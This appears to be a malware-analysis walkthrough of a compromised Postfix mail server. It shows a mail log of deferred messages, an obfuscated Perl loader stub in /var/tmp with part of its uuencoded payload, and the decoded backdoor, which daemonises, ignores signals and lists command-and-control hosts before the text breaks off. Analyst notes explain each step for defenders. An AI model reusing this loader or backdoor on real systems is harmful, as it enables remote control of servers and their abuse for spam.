Mail logs: /var/log/maillog
[$USER@$HOST ~]# ls -lah /var/log/maillog
-rw------- 1 $USER $USER 389M May 5 16:38 /var/log/maillog
[$USER@$HOST ~]#
[$USER@$HOST ~]# tail /var/log/maillog
...
May 5 16:38:12 $HOST postfix/error[23503]: BFB7D5C5B: to=, relay=none, delay=113860, delays=113860/0/0/0.02, dsn=4.4.2, status=deferred
May 5 16:38:12 $HOST postfix/error[23444]: B1F795B2F: to=, relay=none, delay=126392, delays=126392/0/0/0.01, dsn=4.4.2, status=deferred
May 5 16:38:12 $HOST postfix/error[23508]: B43325D1C: to=, relay=none, delay=109668, delays=109668/0/0/0.01, dsn=4.4.2, status=deferred
May 5 16:38:12 $HOST postfix/error[23484]: B7C3D5D1D: to=, relay=none, delay=109668, delays=109668/0/0/0.01, dsn=4.4.2, status=deferred
(delivery temporarily suspended: lost connection with mx-aol.mail.gm0.yahoodns.net[98.136.96.92] while sending RCPT TO)
...
What is this script for?
[$USER@$HOST ~]# cat /var/tmp/LcRVzNke
# Analyst note: loader stub. It accumulates input lines into one string (the
# empty `while()` presumably read <DATA> before the page stripped the angle
# brackets -- confirm against the original file), uudecodes the string with
# unpack('u*'), replaces one fixed 32-hex-digit token with another, and passes
# the result to eval. Everything after __DATA__ is the uuencoded second stage.
my $HyAZMgSzvm='';$HyAZMgSzvm.=$_ while();$HyAZMgSzvm=unpack('u*',$HyAZMgSzvm);$HyAZMgSzvm=~s/295c445c5f495f5f4548533c3c3c3d29/7e797f7f786969607f226f6361233834/gs;eval($HyAZMgSzvm);
__DATA__
M(R$O=7-R+V)I;B]P97)L("UW"G5S92!S=')I8W0["G5S92!03U-)6#L*=7-E
M($E/.CI3;V-K970["G5S92!)3SHZ4V5L96-T.PHD?"`](#$[("9M86EN*"D[
...
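[$USER@$HOST ~]# sed s/eval/print/ /var/tmp/LcRVzNke
Note: as typed, sed has no -i, so it only writes the edited text to stdout and leaves /var/tmp/LcRVzNke unchanged; the perl command below prints the decoded stage only if the eval was really replaced in the file being run (for example, sed -i on a copy). Do the decoding on an isolated analysis host rather than on the affected mail server.
[$USER@$HOST ~]# perl /var/tmp/LcRVzNke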
#!/usr/bin/perl -w
use strict;
use POSIX;
use IO::Socket;
use IO::Select;
# Analyst note: turn on autoflush for the currently selected output handle,
# then hand control to main(), which is defined directly below.
$| = 1; &main();
sub main
{
exit 0 unless defined (my $pid = fork);
exit 0 if $pid;
POSIX::setsid();
$SIG{$_} = "IGNORE" for (qw (HUP INT ILL FPE QUIT ABRT USR1 SEGV USR2 PIPE ALRM TERM CHLD));
umask 0;
chdir "/";
open (STDIN, "/dev/null");
open (STDERR, ">&STDOUT");
my $url = ["5.135.42.98:80","sakurajshtml.org:80","treesnosfx.com:443","libertymovmx.net:80"];
...